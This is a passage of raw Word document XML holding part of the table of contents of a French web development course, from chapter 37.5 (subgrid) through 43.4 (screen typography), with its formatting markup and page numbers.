          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">37.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>subgrid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>342</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>37.6 Imbrication native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>342</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>38. Composants web et système de design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>347</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>38.1 Trois technologies, un composant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>347</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>38.2 Le cycle de vie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>348</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>38.3 API d'un composant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>349</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>38.4 Système de jetons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>349</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>38.5 Documenter la bibliothèque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>350</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>39. Internationalisation et contenu multilingue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>356</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>39.1 Trois mots à distinguer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>356</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>39.2 Déclarer la langue et le sens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>356</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>39.3 Propriétés logiques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>357</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">39.4 Formater avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Intl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>358</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>39.5 Traduire sans concaténer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>359</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>39.6 Organiser les traductions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>360</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>40. Maintenir un site dans le temps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>365</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>40.1 La revue de code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>365</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>40.2 Documenter ce qui ne se lit pas dans le code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>366</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>40.3 La dette technique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>367</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>40.4 Branches, versions et livraisons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>367</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>40.5 Transmettre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>368</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie VII — Le Web comme plateforme</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>41. Applications web progressives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>373</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>41.1 Trois briques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>374</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>41.2 Le manifeste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>375</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>41.3 Le cycle de vie du service worker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>376</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>41.4 Stratégies de cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>377</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>41.5 Hors-ligne utile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>378</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>41.6 Diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>379</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>42. SVG, canvas et visualisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>384</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>42.1 Trois façons de dessiner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>384</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>42.2 Écrire du SVG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>385</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>42.3 Animer sans JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>386</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>42.4 Dessiner sur un canvas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>387</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>42.5 Choisir et vérifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>388</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>43. Polices web et typographie fine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>392</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>43.1 Format et chargement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>392</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>43.2 Métriques et substitution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>393</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>43.3 Polices variables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>394</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>43.4 Typographie à l'écran</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>394</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
